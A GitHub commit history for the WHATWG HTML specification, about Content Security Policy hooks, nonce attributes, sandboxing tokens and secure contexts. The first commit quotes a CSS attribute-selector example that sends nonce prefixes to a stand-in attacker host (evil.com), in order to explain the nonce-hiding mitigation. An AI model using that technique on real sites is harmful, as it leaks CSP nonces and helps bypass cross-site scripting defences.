Commits on Nov 22, 2017
  1. Hide nonce content attribute values

    mikewest authored and annevk committed Nov 22, 2017
    Some [recent attacks on CSP][1] rely on the ability to exfiltrate
    nonce data via various mechanisms that can read content attributes.
    CSS selectors are the best example: through clever use of
    prefix/postfix text matching selectors values can be sent out to an
    attacker's server for reuse (e.g.,
    `script[nonce=a] { background: url("https://evil.com/nonce?a");}`).
    
    This patch mitigates the risk of this class of attack by hiding the
    nonce value from elements' content attributes by moving the `nonce`
    attributes into a new `NoncedElement` interface mixin, which is
    included into `HTMLElement`. That mixin defines the following
    behaviors for the `nonce` content attribute:
    
    1.  When the `nonce` content attribute is set or changed, its new
        value is copied into a `[[CryptographicNonce]]` slot on the
        element.
    
    2.  When a `NoncedElement` is inserted into a document which was
        delivered with a `Content-Security-Policy` header, the `nonce`
        content attribute is cleared out.
    
    The `nonce` IDL attribute getter and setter now operate on the
    `[[CryptographicNonce]]` slot's value rather than reflecting the
    content attribute, meaning that the nonce value remains exposed
    to script, but is opaque to non-script side-channels.
    
    Likewise, the `[[CryptographicNonce]]` slot's value is used when
    populating a request's cryptographic nonce metadata in order to
    deliver the nonce to CSP for validation.
    
    Tests: https://github.com/w3c/web-platform-tests/tree/master/content-security-policy/nonce-hiding
    
    Closes #2369.
    
    [1]: https://www.blackhat.com/docs/us-17/thursday/us-17-Lekies-Dont-Trust-The-DOM-Bypassing-XSS-Mitigations-Via-Script-Gadgets.pdf
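The two steps above, modelled as an added JavaScript illustration rather than the spec's or WHATWG's own code; `NoncedElement`, `Doc`, `selectorMatches` and `demo` are assumed names, and a document's CSP-header status is reduced to a boolean.

```javascript
// Added illustration of the nonce-hiding steps above (not spec or WHATWG code);
// NoncedElement, Doc, selectorMatches and demo are assumed names.
class NoncedElement {
  constructor(tagName) {
    this.tagName = tagName;
    this.attributes = new Map();   // content attributes: what CSS selectors can see
    this.cryptographicNonce = "";  // the [[CryptographicNonce]] slot
  }
  // Step 1: setting or changing the content attribute copies its value into the slot.
  setAttribute(name, value) {
    this.attributes.set(name, String(value));
    if (name === "nonce") this.cryptographicNonce = String(value);
  }
  getAttribute(name) { return this.attributes.has(name) ? this.attributes.get(name) : null; }
  // The IDL attribute reads and writes the slot, so script still sees the nonce.
  get nonce() { return this.cryptographicNonce; }
  set nonce(v) { this.cryptographicNonce = String(v); }
}
class Doc {
  constructor(cspHeaderDelivered) { this.cspHeaderDelivered = cspHeaderDelivered; this.children = []; }
  // Step 2: inserting into a document delivered with a CSP header clears the content
  // attribute. Written straight to the map so the slot keeps the real nonce.
  append(el) {
    this.children.push(el);
    if (this.cspHeaderDelivered && el.attributes.has("nonce")) el.attributes.set("nonce", "");
  }
}
// What a style sheet can observe: attribute selectors over content attributes only.
// Supports tag[attr=v], tag[attr^=v] (prefix) and tag[attr$=v] (suffix).
function selectorMatches(el, tag, attr, op, v) {
  const actual = el.getAttribute(attr);
  if (el.tagName !== tag || actual === null) return false;
  if (v === "" && op !== "=") return false; // CSS: an empty (sub)string never matches
  if (op === "=") return actual === v;
  if (op === "^=") return actual.startsWith(v);
  if (op === "$=") return actual.endsWith(v);
  throw new Error("unsupported operator " + op);
}
function demo(cspHeaderDelivered) {
  const doc = new Doc(cspHeaderDelivered);
  const script = new NoncedElement("script");
  script.setAttribute("nonce", "abc123"); // constructed sample nonce
  doc.append(script);
  return {
    leaksViaCss: selectorMatches(script, "script", "nonce", "^=", "a"),
    contentAttribute: script.getAttribute("nonce"),
    idlNonce: script.nonce,
  };
}
```

With a header-delivered policy the prefix selector no longer matches and `getAttribute("nonce")` is empty, while `script.nonce` still returns the value CSP will validate against.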
Commits on Nov 20, 2017
  1. Editorial: Clarifying secure context integration with Shared Workers

    mikewest authored and domenic committed Nov 20, 2017
    This caused some confusion in a bug report. I think we could have avoided that
    if we'd used a name other than isSecureContext for the variable, as it's
    easily confused with an operation.
Commits on Nov 14, 2016
  1. Apply CSP to javascript URLs in navigate

    mikewest authored and annevk committed Nov 14, 2016
    w3c/webappsec-csp#142 refactors CSP to handle navigation to javascript URLs as inline script. This patch adjusts HTML to call into that refactored algorithm.
    
    Fixes #1901.
Commits on Sep 28, 2016
  1. Add <link nonce>

    mikewest authored and annevk committed Sep 28, 2016
    This patch adds the nonce attribute to <link> elements in order to support CSP
    checks on stylesheet requests. The implementation follows along with the similar
    attributes for <style> and <script>.
    
    Fixes #1814.
Commits on Sep 13, 2016
  1. Treat 'data:' documents as unique, opaque origins (#1756)

    mikewest authored and foolip committed Sep 13, 2016
    This patch changes the handling of 'data:' URLs to which user agents
    navigate. Rather than inheriting the origin of the settings object
    responsible for the navigation, they will be treated as unique,
    opaque origins.
    
    This aligns the spec with the behavior found in Chrome, Safari,
    Opera, and Edge.
    
    Closes #1753.
Commits on Sep 12, 2016
  1. Set "one permitted sandbox navigator" for all sandbox-created popups

    mikewest authored and domenic committed Sep 12, 2016
    This patch ensures that any browsing context created from a sandboxed
    document will have its "one permitted sandbox navigator" set.
    Previously, this property was not set when navigating from a sandboxed
    document whose "sandbox propagates to auxiliary browsing contexts flag"
    was not set (e.g. those loaded with 'allow-popups-to-escape-sandbox'),
    which meant that sandboxed documents could navigate unrelated windows.
    Closing this hole in the spec aligns with the behavior Firefox plans
    to ship, and Chrome intends to align with this behavior as well.
    
    Fixes #1218.
Commits on Aug 19, 2016
  1. Editorial: moar bikeshed metadata

    mikewest authored and annevk committed Aug 19, 2016
    This should cover the few remaining terms that CSP needs, and does some drive-by work for MIX and REFERRER-POLICY as well.
Commits on Aug 18, 2016
  1. Upstream navigation hooks from CSP

    mikewest authored and annevk committed Aug 18, 2016
    This will enable implementation of 'frame-ancestors' and 'form-action', and makes a bit of progress towards #1230.
  2. Editorial: add bikeshed metadata

    mikewest authored and annevk committed Aug 18, 2016
    This patch adds bikeshed metadata for various concepts and terms used by CSP and related specifications.
Commits on Aug 2, 2016
  1. Upstream the 'plugin-types' hooks from CSP3

    mikewest authored and domenic committed Aug 2, 2016
    When processing <applet>, <embed>, and <object>, call into the CSP3
    hooks to ensure that 'plugin-types' is consulted before fetching
    a plugin resource.
Commits on Jul 15, 2016
  1. Add 'creator context security'

    mikewest authored and domenic committed Jul 15, 2016
    Secure Contexts relied on 'creator Document', which was removed in
    #987. This patch caches the security status of that
    Document for the new browsing context's security checks.
    
    w3c/webappsec-secure-contexts#37
  2. Upstream SharedWorker constructor changes from Secure Contexts

    mikewest authored and domenic committed Jul 15, 2016
    Monkey-patches bad. Upstreaming good. Closes w3c/webappsec-secure-contexts#31.
Commits on May 23, 2016
  1. Updating references from CSPDOCUMENT to CSP

    mikewest authored and annevk committed May 23, 2016
    w3c/webappsec-csp@0cd4bf4 folded the one into the other after some discussion at the recent face-to-face. This patch updates HTML accordingly.
    
    Fixes #1157.
Commits on Apr 15, 2016
  1. Wire up CSP's control over the base element

    mikewest authored and annevk committed Apr 15, 2016
    Upstreaming CSP's control over the base element per https://bugzilla.mozilla.org/show_bug.cgi?id=1263286.
  2. Pass parser metadata to Fetch

    mikewest authored and annevk committed Apr 15, 2016
    In order for CSP to correctly implement the 'unsafe-dynamic' source expression, HTML needs to teach Fetch about the parser-insertedness that ought to be associated with script requests.
    
    See w3c/webappsec-csp#70 for context.
    
    The Fetch side of this patch is whatwg/fetch#285.
Commits on Apr 14, 2016
  1. Add a source argument to CSP's inline behavior algorithm

    mikewest authored and annevk committed Apr 14, 2016
    To support hash-based whitelisting of inline event handlers, CSP has added a _source_ argument to the "Should _element_'s inline behavior be blocked by Content Security Policy?" (in w3c/webappsec#13). This
    patch adds the same argument to the four callsites in HTML.
Commits on Apr 8, 2016
  1. Wire up HostEnsureCanCompileStrings to CSP

    mikewest authored and domenic committed Apr 6, 2016
    CSP defines an algorithm we can use to define
    HostEnsureCanCompileStrings, which throws an EvalError if string
    compilation is disallowed.
    
    We define HostEnsureCanCompileStrings here, delegating to CSP's
    EnsureCSPDoesNotBlockStringCompilation, because in the future other
    specs might also want to limit eval and setTimeout. It also centralizes
    all the HostWhatever abstract operations in one place, which is nice.
    
    Fixes #271.
Commits on Apr 6, 2016
  1. Pass cryptographic nonce metadata to Fetch

    mikewest authored and annevk committed Apr 6, 2016
    In order for CSP to correctly block/allow requests, HTML needs to teach
    Fetch about the cryptographic nonce metadata that ought to be associated
    with script requests.
    
    See whatwg/fetch#269 for context.
Commits on Jan 29, 2016
  1. CSP: Fix workers' CSP list initialization.

    mikewest committed Jan 29, 2016
    We should be calling into the relevant algorithm from CSP, rather than
    blindly copying the |response|'s CSP list.
    
    Closes #588.
Commits on Dec 14, 2015
  1. Close #384: add CSP hooks to handle inline events and style

    mikewest authored and annevk committed Dec 4, 2015
    The "Should element's inline behavior be blocked by CSP?" algorithm now
    accepts a "type", and can handle event handlers and style attributes.
    This patch adds the relevant hooks to the handling of those two
    features, and updates the existing hooks for inline `<script>` and
    `<style>` elements themselves.
Commits on Nov 6, 2015
  1. Add a 'noopener' <link rel> keyword and window feature

    mikewest authored and annevk committed Oct 27, 2015
    Based on [Charlie Reis' proposal][1], this patch adds a mechanism
    by which web developers can open a new window without granting that
    window access to the opener browsing context. This is possible today
    via 'rel=noopener target=_blank', but that is both obscure and poorly
    explanatory. This patch adds a 'noopener' keyword to both hyperlinks
    and 'window.open' which clarifies the behavior and makes it available
    without side effects.
    
    [1]: https://wiki.whatwg.org/wiki/Links_to_Unrelated_Browsing_Contexts
  2. Call out to CSP's inline element hooks

    mikewest committed Oct 21, 2015
    Content Security Policy defines a "Should element's inline behavior be
    blocked by Content Security Policy?" algorithm in order to handle things
    like nonces, hashes, and 'unsafe-inline'. This patch adds those hooks to
    the appropriate spots in HTML's 'prepare a script' and 'update a style
    block' algorithms.
    
    #271
Commits on Nov 5, 2015
  1. Move 'HTTPS state' from Window to Document

    mikewest committed Nov 5, 2015
    Based on the discussion in #273, it looks like the right thing
    to do with 'HTTPS state' is to keep Worker state on the Worker object, but
    to move a Document's state from the Window to the Document. This patch does
    just that.
  2. Add and populate global object's "CSP list"

    mikewest committed Oct 21, 2015
    Content Security Policy adds a new property to the global object that
    holds the active policy objects for a context. This patch merges this
    property into HTML, and initialises it whenever creating new Document
    and Worker objects.
    
    #271
Commits on Oct 21, 2015
  1. Update CSP links

    mikewest committed Oct 21, 2015
    The CSP specification has moved. This patch updates links accordingly, and
    takes the opportunity to rename an algorithm and remove a referenced
    directive that no longer exists.
    
    #271
Commits on Sep 24, 2015
  1. Add 'HTTPS state' to settings objects

    mikewest authored and annevk committed Sep 22, 2015
    This patch threads Fetch's Response object's 'HTTPS state' through to the
    settings object in the Document or Worker that the response populates.
    This seems fairly straightforward for Workers, but Documents are a bit
    iffy.
    
    See also https://www.w3.org/Bugs/Public/show_bug.cgi?id=27147 and
    https://www.w3.org/Bugs/Public/show_bug.cgi?id=27190.
Commits on Sep 9, 2015
  1. Close #123: add creation URL to environment settings objects

    mikewest authored and annevk committed Sep 9, 2015
    As discussed in https://www.w3.org/Bugs/Public/show_bug.cgi?id=27146,
    "creation URL" gives Service Workers and Secure Contexts the ability
    to perform security checks based upon the original URL of the document
    or worker with which an environment settings object is associated.
    
    The value is set at creation time, and is therefore not influenced by
    things like `history.pushState()` or `history.replaceState()`.
Commits on Sep 8, 2015
  1. Fix #88: add the 'Content-Security-Policy' pragma directive

    mikewest authored and annevk committed Sep 3, 2015
    Content Security Policy defines a new value for the <meta> element's
    'http-equiv' content attribute[1]. This patch integrates that
    definition into HTML.
    
    [1]: https://w3c.github.io/webappsec/specs/content-security-policy/#delivery-html-meta-element
Commits on Aug 31, 2015
  1. Block modal dialogs by default in sandboxed documents

    mikewest authored and annevk committed Aug 29, 2015
    This patch alters 'window.alert()', 'window.confirm()', 'window.print()',
    'window.prompt()', and the 'beforeunload' event to suppress the modal
    dialogs they would otherwise generate when called or fired from within a
    sandboxed document. A new 'allow-modals' sandboxing token is added in
    order to re-enable this functionality if desired.
    
    Discussed at [1] and [2].
    
    [1]: https://groups.google.com/a/chromium.org/d/msg/blink-dev/wXbgxLu63Fo/YtsqkySmTWcJ
    [2]: https://lists.w3.org/Archives/Public/public-whatwg-archive/2015May/0035.html
    
    Closes [3].
    
    [3]: https://www.w3.org/Bugs/Public/show_bug.cgi?id=28818
  2. Define script@nonce and style@nonce attributes

    mikewest committed Aug 28, 2015
    The definitions here are little more than placeholders. We need to
    improve the description in CSP such that HTML can hook into reasonable
    definitions of the behavior that nonces require when executing the
    "prepare a script" and "update a style block" algorithms. For the
    moment, defining the attributes and pointing out to the CSP spec (and
    to w3c/webappsec#463) is probably Good Enough(tm).
Commits on Aug 30, 2015
  1. Cleanup sandbox token lists

    mikewest authored and annevk committed Aug 29, 2015
    955fbaa added the 'allow-popups-to-escape-sandbox' sandbox token,
    but neglected to update a few lists which ought to have contained it. This
    patch takes care of those.
Commits on Aug 29, 2015
  1. Add an 'allow-popups-to-escape-sandbox' sandboxing token

    mikewest committed Aug 28, 2015
    This patch adds the sandbox-escaping functionality described at [1],
    which will allow a sandboxed document to spawn new windows without
    forcing the set of active sandboxing flags upon them. This allows, for
    example, a third-party advertisement to be (more) safely sandboxed
    without forcing the same restrictions upon a landing page.
    
    Discussed at [2] and [3].
    
    [1]: https://www.w3.org/Bugs/Public/show_bug.cgi?id=28817
    [2]: https://lists.w3.org/Archives/Public/public-whatwg-archive/2015May/0035.html
    [3]: https://groups.google.com/a/chromium.org/d/msg/blink-dev/wXbgxLu63Fo/YtsqkySmTWcJ